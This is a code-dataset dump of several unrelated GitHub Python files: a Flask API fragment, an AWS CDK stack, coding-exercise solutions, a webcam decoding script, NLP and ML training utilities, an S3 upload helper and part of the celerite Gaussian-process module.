-wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n # json.dump(str(jason_data),fo)\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n return jsonify(BOOK_REQUESTS[_id]), 200\n\n\n@REQUEST_API.route('/request/', methods=['DELETE'])\ndef delete_record(_id):\n \"\"\"Delete a book request record\n @param id: the id\n @return: 204: an empty payload.\n @raise 404: if book request not found\n \"\"\"\n if _id not in BOOK_REQUESTS:\n abort(404)\n\n del BOOK_REQUESTS[_id]\n # save the new book to jason file, further jobs: need to rewrite the file under the formatal style for read it easily. -wayne W\n fo = open(\"./routes/data1.json\", \"w\")\n # json.dump(str(jason_data),fo)\n fo.write( str(json.dumps(json_data)) )\n fo.close()\n return '', 204\n","repo_name":"waynexw/VOA_LOAD","sub_path":"Python/request_api-backup0721.py","file_name":"request_api-backup0721.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26050195272","text":"from aws_cdk import (\n Duration,\n Stack,\n aws_lambda as _lambda,\n aws_sqs as sqs,\n aws_apigateway as apigw,\n aws_stepfunctions as sfn,\n aws_stepfunctions_tasks as tasks,\n aws_iam as iam,\n aws_s3 as s3,\n aws_sns as sns,\n aws_s3_notifications as s3n,\n aws_dynamodb as dynamodb,\n aws_logs as logs,\n aws_sns_subscriptions as subscriptions,\n aws_lambda_event_sources as lambda_event_sources,\n aws_lambda_python_alpha as lambda_python,\n)\nimport aws_cdk as cdk\nfrom constructs import Construct\nfrom deploy.api.infrastructure.chaliceapp import ChaliceApp\n\n\nclass BrokerStack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n self.queues = []\n\n self.trigger_topic = sns.Topic(self, \"TriggerTopic\")\n\n self.bucket = s3.Bucket(\n self,\n \"InputBucket\",\n enforce_ssl=True,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n )\n\n self.table = dynamodb.Table(\n self,\n \"WorkflowTable\",\n partition_key=dynamodb.Attribute(\n # submission_id?\n name=\"user_id#workflow_id\",\n type=dynamodb.AttributeType.STRING,\n ),\n sort_key=dynamodb.Attribute(\n name=\"workflow#id\", type=dynamodb.AttributeType.STRING\n ),\n time_to_live_attribute=\"ttl\",\n replication_regions=[],\n billing_mode=dynamodb.BillingMode.PROVISIONED,\n removal_policy=cdk.RemovalPolicy.DESTROY,\n )\n\n self.table.auto_scale_write_capacity(\n min_capacity=1, max_capacity=2\n ).scale_on_utilization(target_utilization_percent=75)\n\n input_validator_lambda = lambda_python.PythonFunction(\n self,\n \"InputValidatorLambda\",\n entry=\"lambdas/\",\n runtime=_lambda.Runtime.PYTHON_3_9,\n handler=\"handler\",\n index=\"validator.py\",\n environment={\n \"WORKFLOW_TABLE\": self.table.table_name,\n \"LOG_LEVEL\": \"INFO\",\n },\n log_retention=logs.RetentionDays.THREE_DAYS,\n )\n\n self.table.grant_write_data(input_validator_lambda)\n\n self.bucket.add_event_notification(\n s3.EventType.OBJECT_CREATED,\n s3n.LambdaDestination(input_validator_lambda)\n # could add filters here\n )\n self.bucket.grant_read(input_validator_lambda)\n\n publish_to_sns_lambda = _lambda.Function(\n self,\n \"PublishToSnsLambda\",\n runtime=_lambda.Runtime.PYTHON_3_9,\n code=_lambda.Code.from_asset(\"lambdas\"),\n handler=\"publisher.handler\",\n environment={\n \"SNS_TOPIC_ARN\": self.trigger_topic.topic_arn,\n \"LOG_LEVEL\": \"INFO\",\n },\n log_retention=logs.RetentionDays.THREE_DAYS,\n )\n publish_to_sns_lambda.add_event_source(\n 
lambda_event_sources.DynamoEventSource(\n self.table,\n starting_position=_lambda.StartingPosition.TRIM_HORIZON,\n batch_size=5,\n bisect_batch_on_error=True,\n filters=[\n _lambda.FilterCriteria.filter(\n {\n \"eventName\": [\"MODIFY\"],\n \"dynamodb\": {\n \"Keys\": {\"workflow#id\": {\"S\": [\"submission#0\"]}},\n \"OldImage\": {\n \"is_valid\": {\n \"BOOL\": _lambda.FilterRule.not_exists()\n }\n },\n \"NewImage\": {\"is_valid\": {\"BOOL\": [True]}},\n },\n }\n )\n ],\n # on_failure=SqsDlq(dead_letter_queue),\n )\n )\n\n self.trigger_topic.grant_publish(publish_to_sns_lambda)\n\n self.api = ChaliceApp(\n self,\n broker_table=self.table,\n broker_bucket=self.bucket,\n broker_queues=self.queues,\n )\n\n def get_queue(self, workflow_name: str):\n queue = sqs.Queue(self, f\"{workflow_name}Queue\")\n self.queues.append(queue)\n\n self.trigger_topic.add_subscription(subscriptions.SqsSubscription(queue))\n return queue\n\n def register_workflows(self):\n pass\n","repo_name":"noxjonas/workflow-broker","sub_path":"deploy/app_stack.py","file_name":"app_stack.py","file_ext":"py","file_size_in_byte":4584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36714116465","text":"#!/bin/python3\n\n#\n# Url: https://www.hackerrank.com/challenges/swap-case/problem\n#\n# Title: sWAP cASE\n#\n# Arquivo de Teste\n#\n\ndef swap_case(texto):\n saida = ''\n for caracter_atual in texto:\n if caracter_atual.islower():\n saida += caracter_atual.upper()\n elif caracter_atual.isupper():\n saida += caracter_atual.lower()\n else:\n saida += caracter_atual\n return saida\n\n\n\nif __name__ == '__main__':\n entrada1 = 'HackerRank.com presents \"Pythonist 2\".'\n esperado1 = 'hACKERrANK.COM PRESENTS \"pYTHONIST 2\".'\n teste1 = swap_case(entrada1)\n if esperado1 != teste1:\n print('Valor errado: ', teste1)\n else:\n print('Valor correto: ', teste1)\n","repo_name":"LuanaSchlei/HackerRank_Python","sub_path":"swap-case/swap-case-teste.py","file_name":"swap-case-teste.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74832630226","text":"n = 5\narr1 = [9, 20, 28, 18, 11]\narr2 = [30, 1, 21, 17, 28]\n# result = [\"#####\", \"# # #\", \"### #\", \"# ##\", \"#####\"]\n\n\n# def solution(n, arr1, arr2):\n# answer = []\n# map1 = []\n# map2 = []\n# for num in arr1:\n# map1.append(num_to_bin(n, num))\n# for num in arr2:\n# map2.append(num_to_bin(n, num))\n# for i in range(n):\n# row = \"\"\n# for j in range(n):\n# if map1[i][j] == \"1\" or map2[i][j] == \"1\":\n# row += \"#\"\n# else:\n# row += \" \"\n# answer.append(row)\n# print(answer)\n# return answer\n\n\n# def num_to_bin(n, num):\n# value = ''\n# while num > 1:\n# num, mod = divmod(num, 2)\n# value = str(mod) + value\n# value = str(num) + value\n# while len(value) < n:\n# value = \"0\" + value\n# return value\n\n\n# print(solution(n, arr1, arr2))\n# print(result)\n\n\n########################미친놈들풀이########################\n\ndef solution(n, arr1, arr2):\n answer = []\n for i, j in zip(arr1, arr2):\n row = str(bin(i | j)[2:])\n row = row.rjust(n, '0')\n row = row.replace('1', '#')\n row = row.replace('0', ' ')\n answer.append(row)\n return answer\n\n\nprint(solution(n, arr1, 
arr2))\n","repo_name":"Jarry-Ha/TIL_github","sub_path":"0_algorithm/programmers/비밀지도.py","file_name":"비밀지도.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42592011191","text":"import datetime\nfrom decode import ROW_NUM\nimport imutils\nfrom threading import Thread\nimport threading\nimport cv2\nimport time\nimport numpy as np\n\n\ndef capture(frames, lock):\n stream = cv2.VideoCapture(0)\n cnt = 0\n while cnt < 990:\n (grabbed, frame) = stream.read()\n with lock:\n frames.append(frame)\n #cv2.imshow(\"Frame\", frame)\n #key = cv2.waitKey(1) & 0xFF\n if cnt == 0:\n cv2.imwrite(\"initial.png\", frame)\n cnt += 1\n # cv2.destroyAllWindows()\n\n\ndef Process(chunks):\n if len(chunks) >= 900:\n print(chunks[0].shape)\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter('output.mp4', fourcc, 30.0, (1280, 720))\n for i in chunks:\n out.write(i)\n out.release()\n exit()\n\ndef get_difference(previous_frame, current_frame):\n previous_frame = previous_frame.astype(np.int32)\n current_frame = current_frame.astype(np.int32)\n\n d_pixel = np.sum(np.abs(previous_frame - current_frame))/(previous_frame.shape[0]*previous_frame.shape[1])\n old_bins = np.zeros(766)\n new_bins = np.zeros(766)\n for i in range(previous_frame.shape[0]): # height\n for j in range(previous_frame.shape[1]): # width\n old_bins[np.sum(previous_frame[i, j, :])] += 1\n new_bins[np.sum(current_frame[i, j, :])] += 1\n d_histo = np.nansum(np.power((old_bins - new_bins), 2)/np.maximum(old_bins, new_bins))\n\n return d_pixel, d_histo\n\n\ndef decode(chunks, c_lock):\n chunks_ind = 0\n currentFrame = None\n nextFrame = None\n # constant for determining scene type\n d_pixel_cut = 100\n d_pixel_static = 10\n d_histo_cut = 1\n d_histo_static = 0.1\n while True:\n enough_frame = False\n with c_lock:\n if len(chunks)-chunks_ind > 12:\n currentFrameWindow = chunks[chunks_ind:chunks_ind+6]\n nextFrameWindow = chunks[chunks_ind+6:chunks_ind+12]\n enough_frame = True\n chunks_ind += 6\n if enough_frame:\n # read current and next window (total of 12 frames)\n # currentFrameWindow = read_window()\n # nextFrameWindow = read_window(vidcap)\n currentSampleFrame = currentFrameWindow[0]\n nextSampleFrame = nextFrameWindow[0]\n\n height = currentSampleFrame.shape[0]\n width = currentSampleFrame.shape[1]\n\n # resized_current_image = resize_image(currentSampleFrame)\n # resized_next_image = resize_image(nextSampleFrame)\n\n # get difference\n resized_current_frame = cv2.resize(currentSampleFrame, (int(width/4), int(height/4)))\n resized_next_frame = cv2.resize(nextSampleFrame, (int(width/4), int(height/4)))\n d_pixel, d_histo = get_difference(resized_current_frame, resized_next_frame)\n\n # determine frame scene\n if d_pixel > d_pixel_cut and d_histo > d_histo_cut: # cut scene\n return\n # frameScene = cut\n # currentSampleFrame = nextSampleFrame # assign the new frame to previous frame for next window\n # currentFrameWindow = nextFrameWindow # assign the next window to current window\n # continue\n # elif d_pixel < d_pixel_static and d_histo < d_histo_static: # static scene\n # frameScene = static\n # else:\n # frameScene = gradual\n\n # sum RGB\n currentFrameWindow = np.sum(currentFrameWindow, axis=3)\n\n # display pixel value\n # fprintf(\"--------------------\\npixel value on %d th frame\\n\", i-6)\n # fprintf(\"%d %d %d %d %d %d\\n\", currentFrameWindow(360, 640, 1), currentFrameWindow(360, 640, 2), currentFrameWindow(360, 640, 
3), currentFrameWindow(360, 640, 4), currentFrameWindow(360, 640, 5), currentFrameWindow(360, 640, 6))\n\n # cut into grids\n ROW_NUM = 1\n COL_NUM = 1\n row_num = ROW_NUM\n col_num = COL_NUM\n for j in range(row_num):\n for k in range(col_num):\n center_height = int((j+0.5)*height/row_num)\n center_width = int((k+0.5)*width/col_num)\n\n # pixelIntensity = (squeeze(currentFrameWindow(centerHeight, centerWidth, : ))).'\n pixel_intensity = currentFrameWindow[:, center_height, center_width]\n alpha_value = 1 - pixel_intensity/pixel_intensity[1]\n\n # extended_alpha = np.tile(alphaValue, 5)\n demodulation = np.fft.fft(alpha_value, 30)\n # Pyy = demodulation * np.conjugate(demodulation) / 30 # normalization\n Pyy = abs(demodulation) / 30\n\n # freq = np.arange(0, 15)*60/30\n # plt.plot(freq, Pyy[:15])\n # plt.show()\n\n if Pyy[11] > Pyy[16]:\n print(\"0\")\n # output_value.append(0)\n else:\n print(\"1\")\n # output_value.append(1)\n\n # print(len(chunks))\n\n\ndef main():\n frames = []\n frames_ind = 0\n fps = 30\n second = None\n chunks = []\n chunk_len = 6\n lock = threading.Lock()\n c_lock = threading.Lock()\n thread1 = threading.Thread(target=capture, args=(frames, lock))\n thread1.start()\n thread2 = threading.Thread(target=capture, args=(frames, lock))\n thread2.start()\n thread3 = threading.Thread(target=decode, args=(chunks, c_lock))\n thread3.start()\n # capture(frames)\n time.sleep(1)\n with lock:\n frames_ind = len(frames)\n start_time = time.time()\n try:\n while True:\n if time.time() - start_time >= 1:\n start_time = time.time()\n with lock:\n second = frames[frames_ind:]\n frames_ind = len(frames)\n second = [second[int(i*len(second) / fps)] for i in range(fps)]\n chunks.extend(second)\n print(len(chunks))\n # Process(chunks)\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ching-Chu-Lin/WNFA-final","sub_path":"src/capture (1).py","file_name":"capture (1).py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72322870547","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n author: Noémi Vadász\n last update: 2019/12/02\n\n\"\"\"\n\nimport sys\n\n# google spreadsheet fields\n# 0: TOKEN ID\n# 1: FORM\n# 2: LEMMA\n# 3: UPOS\n# 4: UPOS\n# 5: FEATS\n# 6: HEAD\n# 7: DEPREL\n# 8: DEPS\n# 9: REFREL\n# 10: REFTYPE\n# 11: javított szóalak (corrected word form)\n# 12: javított tő (corrected lemma)\n# 13: javított szófaj (corrected POS)\n# 14: javított morfológia (corrected morphology)\n# 15: tokenizálási hiba (tokenization error)\n# 16: függőségi hiba (dependency error)\n\n\nxtsv_fields = {'TOKEN ID': 'id',\n 'FORM': 'form',\n 'LEMMA': 'lemma',\n 'UPOS': 'upos',\n 'FEATS': 'feats',\n 'HEAD': 'head',\n 'DEPREL': 'deprel',\n 'REFREL': 'corefhead',\n 'REFTYPE': 'coreftype'\n }\n\n\ndef read_lines():\n\n header = sys.stdin.readline().strip().split('\\t')\n\n lines = list()\n\n for line in sys.stdin:\n\n if not line.startswith('#'):\n stripline = line.strip().split('\\t')\n if len(stripline) > 1:\n fields = dict()\n for field in header:\n if len(stripline) > header.index(field):\n fields[field] = stripline[header.index(field)]\n else:\n fields[field] = '_'\n\n lines.append(fields)\n else:\n lines.append('')\n\n return header, lines\n\n\ndef do_commands(lines):\n\n for line in lines:\n if isinstance(line, dict):\n if line['javított szóalak'] != '_':\n line['FORM'] = line['javított szóalak']\n if line['javított tő'] != '_':\n line['LEMMA'] = line['javított tő']\n if line['javított szófaj'] != '_':\n line['UPOS'] = line['javított szófaj']\n if line['javított 
morfológia'] != '_':\n line['FEATS'] = line['javított morfológia']\n\n\ndef order_fields(lines):\n\n xlines = list()\n\n for line in lines:\n if isinstance(line, dict):\n fields = dict()\n for field in line:\n if field in xtsv_fields:\n fields[xtsv_fields[field]] = line[field]\n\n for value in xtsv_fields.values():\n if value not in fields:\n fields[value] = '_'\n xlines.append(fields)\n\n else:\n xlines.append('')\n\n xheader = xlines[0].keys()\n\n return xheader, xlines\n\n\ndef print_xtsv(header, lines):\n\n print('\\t'.join(header))\n for line in lines:\n if isinstance(line, dict):\n\n print('\\t'.join(val for val in line.values()))\n else:\n print(line)\n\n\ndef main():\n\n header, lines = read_lines()\n do_commands(lines)\n xheader, xlines = order_fields(lines)\n print_xtsv(xheader, xlines)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vadno/korkor_pilot","sub_path":"scripts/coref_postproc.py","file_name":"coref_postproc.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"12370022650","text":"import torch\nfrom concat_dataset import ConcatDataset\nfrom torch.utils.data.dataloader import DataLoader\n\nclass Train:\n def __init__(self, config, preProcessedData, collate_fn):\n super().__init__()\n\n self.batch_size = config[\"batch_size\"]\n self.epochs = config[\"epoch\"]\n self.early_stop = config[\"early_stop\"]\n\n # define train test split\n train_qty = int(0.9 * len(preProcessedData.labels))\n validation_qty = len(preProcessedData.labels) - train_qty\n\n torch.manual_seed(0)\n\n labelled_data = [[s, l] for s,l in zip(preProcessedData.sentence_representation, preProcessedData.label_representation)]\n train_data, validation_data = torch.utils.data.random_split(labelled_data, [train_qty, validation_qty])\n\n self.x_train, self.y_train = [], []\n\n for train_dp in train_data:\n self.x_train.append(train_dp[0])\n self.y_train.append(train_dp[1])\n\n self.x_validation, self.y_validation = [], []\n\n for val_dp in validation_data:\n self.x_validation.append(val_dp[0])\n self.y_validation.append(val_dp[1])\n\n # initialise dataloaders\n self.concat_train = ConcatDataset((self.x_train, self.y_train))\n self.dataloader_train = DataLoader(self.concat_train, batch_size=self.batch_size, collate_fn=collate_fn)\n self.concat_validation = ConcatDataset((self.x_validation, self.y_validation))\n self.dataloader_validation = DataLoader(self.concat_validation, batch_size=self.batch_size, collate_fn=collate_fn)\n\n def doTraining(self, model, model_name, loss_fxn, optimizer, accuracy_fxn):\n model.train()\n early_stop, best_accuracy = 0, 0\n\n for epoch in range(self.epochs):\n batch_count = 1\n\n for data, label, length in self.dataloader_train:\n optimizer.zero_grad()\n y_pred = model(data, length)\n loss = loss_fxn(y_pred, torch.tensor(label))\n batch_count += 1\n loss.backward()\n optimizer.step()\n\n accuracy, _, _ = accuracy_fxn(model, self.dataloader_validation)\n\n if accuracy > best_accuracy:\n best_accuracy = accuracy\n early_stop = 0\n torch.save(model, f\"data/{model_name}.model\")\n print(f\"epoch: {epoch + 1}\\tbatch: {batch_count}\\taccuracy: {best_accuracy}\")\n else:\n early_stop += 1\n if early_stop >= self.early_stop:\n print(\"early stop condition met\")\n break\n final_model = torch.load(f\"data/{model_name}.model\")\n accuracy, y_actual, y_pred = accuracy_fxn(final_model, self.dataloader_validation)\n return accuracy, 
y_pred","repo_name":"AgreshB/Text-Mining-Classification","sub_path":"bilstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1729143863","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom neupy import algorithms, layers, environment\n\n\ndef rmsle(expected, predicted):\n log_expected = np.log1p(expected + 1)\n log_predicted = np.log1p(predicted + 1)\n squared_log_error = np.square(log_expected - log_predicted)\n return np.sqrt(np.mean(squared_log_error))\n\n\nenvironment.reproducible()\nplt.style.use('ggplot')\n\ndataset = datasets.load_boston()\ndata = dataset.data\ntarget = dataset.target.reshape((-1, 1))\n\ndata_scaler = preprocessing.MinMaxScaler((-3, 3))\ntarget_scaler = preprocessing.MinMaxScaler()\n\ndata = data_scaler.fit_transform(data)\ntarget = target_scaler.fit_transform(target)\n\nx_train, x_test, y_train, y_test = train_test_split(\n data, target, test_size=0.15\n)\n\ncgnet = algorithms.Hessian(\n connection=[\n layers.Input(13),\n layers.Sigmoid(50),\n layers.Sigmoid(10),\n layers.Sigmoid(1),\n ],\n verbose=True,\n)\n\ncgnet.train(x_train, y_train, x_test, y_test, epochs=3)\ny_predict = cgnet.predict(x_test)\n\ny_test = target_scaler.inverse_transform(y_test.reshape((-1, 1)))\ny_predict = target_scaler.inverse_transform(y_predict).T.round(1)\nerror = rmsle(y_predict, y_test)\nprint(\"RMSLE = {}\".format(error))\n","repo_name":"Alvinhaidar/neupy","sub_path":"examples/mlp/boston_price_prediction.py","file_name":"boston_price_prediction.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19386634793","text":"import boto3\n\ndef uploadtos3():\n s3 = boto3.client(\"s3\")\n \n bucket = \"realestatedata123\"\n filename = \"data.txt\"\n mapfilename = \"map.html\"\n\n s3.upload_file(\"./data.txt\", bucket, filename, ExtraArgs={'ContentType': 'text/plain'})\n s3.upload_file(\"./map.html\", bucket, mapfilename, ExtraArgs={'ContentType': 'text/html'}) ","repo_name":"natachikhinashvili/real-estate","sub_path":"uploadtos3.py","file_name":"uploadtos3.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33151625656","text":"t = int(input())\n\nfor i in range(t):\n \n data = input()\n lst = [data[0]]\n if data[0] == \")\":\n print(\"NO\")\n continue\n\n for j in data[1:]:\n if j == \"(\":\n lst.append(j)\n else:\n if not lst:\n lst.append(j)\n break\n elif lst[-1] == \"(\":\n lst.pop()\n if not lst:\n print(\"YES\")\n else:\n print(\"NO\")\n\n","repo_name":"HeoYou/algorithm-python","sub_path":"Q9012 괄호.py","file_name":"Q9012 괄호.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43202477094","text":"# -*- coding:utf-8 -*-\n# @Author:Cheng Lei 1037654919@qq.com\n# @Time : 2022/6/6 下午5:22\n# @FileName: test_ triangles.py\n# @Software: PyCharm\n\n#杨辉三角 write by cl\ndef triangles(max):\n n=0\n lll=[]\n while n<=max:\n ll=[1 for i in range(n+1)]\n for i in range(n+1):\n if i ==0 or i==n:\n ll[i]=1\n else:\n ll[i]=lll[i-1]+lll[i]\n n+=1\n lll=ll\n yield ll\n#大神的\ndef triangles2():\n L = [1]\n while True:\n yield L\n L = [1] + [L[n] + L[n + 1] for n in 
range(len(L) - 1)] + [1]\n\nn=0\nresults = []\nfor t in triangles2():\n results.append(t)\n n = n + 1\n if n == 10:\n break\n\nfor t in results:\n print(t)\n\n","repo_name":"beihai-xiaoshi/test","sub_path":"test_ triangles.py","file_name":"test_ triangles.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20725135833","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function\nimport math\nimport warnings\nimport numpy as np\n\nfrom . import solver, terms\nfrom .modeling import ModelSet, ConstantModel\n\n__all__ = [\"GP\"]\n\n\nclass GP(ModelSet):\n \"\"\"The main interface to the celerite Gaussian Process solver\n\n Args:\n kernel: An instance of a subclass of :class:`terms.Term`.\n mean (Optional): A simple mean value for the process. This can either\n be a ``float`` or a subclass of :class:`modeling.Model`.\n (default: ``0.0``)\n fit_mean (optional): If ``False``, all of the parameters of ``mean``\n will be frozen. Otherwise, the parameter states are unaffected.\n (default: ``False``)\n\n \"\"\"\n\n def __init__(\n self,\n kernel,\n mean=0.0,\n fit_mean=False,\n log_white_noise=None,\n fit_white_noise=False,\n ):\n self._solver = None\n self._computed = False\n self._t = None\n self._y_var = None\n\n # Backwards compatibility for 'log_white_noise' parameter\n if log_white_noise is not None:\n warnings.warn(\n \"The 'log_white_noise' parameter is deprecated. \"\n \"Use a 'JitterTerm' instead.\"\n )\n k = terms.JitterTerm(log_sigma=float(log_white_noise))\n if not fit_white_noise:\n k.freeze_parameter(\"log_sigma\")\n kernel += k\n\n # Build up a list of models for the ModelSet\n models = [(\"kernel\", kernel)]\n\n # And the mean model\n try:\n float(mean)\n except TypeError:\n pass\n else:\n mean = ConstantModel(float(mean))\n\n if not fit_mean:\n for k in mean.get_parameter_names():\n mean.freeze_parameter(k)\n models += [(\"mean\", mean)]\n\n # Init the superclass\n super(GP, self).__init__(models)\n\n @property\n def solver(self):\n if self._solver is None:\n self._solver = solver.CholeskySolver()\n return self._solver\n\n @property\n def mean(self):\n \"\"\"The mean :class:`modeling.Model`\"\"\"\n return self.models[\"mean\"]\n\n @property\n def kernel(self):\n return self.models[\"kernel\"]\n\n @property\n def dirty(self):\n return super(GP, self).dirty or not self._computed\n\n @dirty.setter\n def dirty(self, value):\n self._computed = not value\n super(GP, self.__class__).dirty.fset(self, value)\n\n @property\n def computed(self):\n return (\n self._solver is not None\n and self.solver.computed()\n and not self.dirty\n )\n\n def compute(\n self, t, yerr=1.123e-12, check_sorted=True, A=None, U=None, V=None\n ):\n \"\"\"\n Compute the extended form of the covariance matrix and factorize\n\n Args:\n x (array[n]): The independent coordinates of the data points.\n This array must be _sorted_ in ascending order.\n yerr (Optional[float or array[n]]): The measurement uncertainties\n for the data points at coordinates ``x``. These values will be\n added in quadrature to the diagonal of the covariance matrix.\n (default: ``1.123e-12``)\n check_sorted (bool): If ``True``, ``x`` will be checked to make\n sure that it is properly sorted. 
If ``False``, the coordinates\n will be assumed to be in the correct order.\n\n Raises:\n ValueError: For un-sorted data or mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n t = np.atleast_1d(t)\n if check_sorted and np.any(np.diff(t) < 0.0):\n raise ValueError(\"the input coordinates must be sorted\")\n if check_sorted and len(t.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n self._t = t\n self._yerr = np.empty_like(self._t)\n self._yerr[:] = yerr\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = self.kernel.coefficients\n self._A = np.empty(0) if A is None else A\n self._U = np.empty((0, 0)) if U is None else U\n self._V = np.empty((0, 0)) if V is None else V\n self.solver.compute(\n self.kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n self._A,\n self._U,\n self._V,\n t,\n self._yerr ** 2,\n )\n self.dirty = False\n\n def _recompute(self):\n if not self.computed:\n if self._t is None:\n raise RuntimeError(\"you must call 'compute' first\")\n self.compute(\n self._t,\n self._yerr,\n check_sorted=False,\n A=self._A,\n U=self._U,\n V=self._V,\n )\n\n def _process_input(self, y):\n if self._t is None:\n raise RuntimeError(\"you must call 'compute' first\")\n if len(self._t) != len(y):\n raise ValueError(\"dimension mismatch\")\n return np.ascontiguousarray(y, dtype=float)\n\n def log_likelihood(self, y, _const=math.log(2.0 * math.pi), quiet=False):\n \"\"\"\n Compute the marginalized likelihood of the GP model\n\n The factorized matrix from the previous call to :func:`GP.compute` is\n used so ``compute`` must be called first.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n quiet (bool): If true, return ``-numpy.inf`` for non-positive\n definite matrices instead of throwing an error.\n\n Returns:\n float: The marginalized likelihood of the GP model.\n\n Raises:\n ValueError: For mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n y = self._process_input(y)\n resid = y - self.mean.get_value(self._t)\n try:\n self._recompute()\n except solver.LinAlgError:\n if quiet:\n return -np.inf\n raise\n if len(y.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n logdet = self.solver.log_determinant()\n if not np.isfinite(logdet):\n return -np.inf\n loglike = -0.5 * (\n self.solver.dot_solve(resid) + logdet + len(y) * _const\n )\n if not np.isfinite(loglike):\n return -np.inf\n return loglike\n\n def grad_log_likelihood(self, y, quiet=False):\n \"\"\"\n Compute the gradient of the marginalized likelihood\n\n The factorized matrix from the previous call to :func:`GP.compute` is\n used so ``compute`` must be called first. 
The gradient is taken with\n respect to the parameters returned by :func:`GP.get_parameter_vector`.\n This function requires the `autograd\n `_ package.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n quiet (bool): If true, return ``-numpy.inf`` and a gradient vector\n of zeros for non-positive definite matrices instead of\n throwing an error.\n\n Returns:\n The gradient of marginalized likelihood with respect to the\n parameter vector.\n\n Raises:\n ValueError: For mismatched dimensions.\n solver.LinAlgError: For non-positive definite matrices.\n\n \"\"\"\n if not solver.has_autodiff():\n raise RuntimeError(\n \"celerite must be compiled with autodiff \"\n \"support to use the gradient methods\"\n )\n\n if not self.kernel.vector_size:\n return self.log_likelihood(y, quiet=quiet), np.empty(0)\n\n y = self._process_input(y)\n if len(y.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n resid = y - self.mean.get_value(self._t)\n\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = self.kernel.coefficients\n try:\n val, grad = self.solver.grad_log_likelihood(\n self.kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n self._A,\n self._U,\n self._V,\n self._t,\n resid,\n self._yerr ** 2,\n )\n except solver.LinAlgError:\n if quiet:\n return -np.inf, np.zeros(self.vector_size)\n raise\n\n if self.kernel._has_coeffs:\n coeffs_jac = self.kernel.get_coeffs_jacobian()\n full_grad = np.dot(coeffs_jac, grad[1:])\n else:\n full_grad = np.zeros(self.kernel.vector_size)\n if self.kernel._has_jitter:\n jitter_jac = self.kernel.get_jitter_jacobian()\n full_grad += jitter_jac * grad[0]\n\n if self.mean.vector_size:\n self._recompute()\n alpha = self.solver.solve(resid)\n g = self.mean.get_gradient(self._t)\n full_grad = np.append(full_grad, np.dot(g, alpha))\n\n return val, full_grad\n\n def apply_inverse(self, y):\n \"\"\"\n Apply the inverse of the covariance matrix to a vector or matrix\n\n Solve ``K.x = y`` for ``x`` where ``K`` is the covariance matrix of\n the GP with the white noise and ``yerr`` components included on the\n diagonal.\n\n Args:\n y (array[n] or array[n, nrhs]): The vector or matrix ``y``\n described above.\n\n Returns:\n array[n] or array[n, nrhs]: The solution to the linear system.\n This will have the same shape as ``y``.\n\n Raises:\n ValueError: For mismatched dimensions.\n\n \"\"\"\n self._recompute()\n return self.solver.solve(self._process_input(y))\n\n def dot(\n self, y, t=None, A=None, U=None, V=None, kernel=None, check_sorted=True\n ):\n \"\"\"\n Dot the covariance matrix into a vector or matrix\n\n Compute ``K.y`` where ``K`` is the covariance matrix of the GP without\n the white noise or ``yerr`` values on the diagonal.\n\n Args:\n y (array[n] or array[n, nrhs]): The vector or matrix ``y``\n described above.\n kernel (Optional[terms.Term]): A different kernel can optionally\n be provided to compute the matrix ``K`` from a different\n kernel than the ``kernel`` property on this object.\n\n Returns:\n array[n] or array[n, nrhs]: The dot product ``K.y`` as described\n above. 
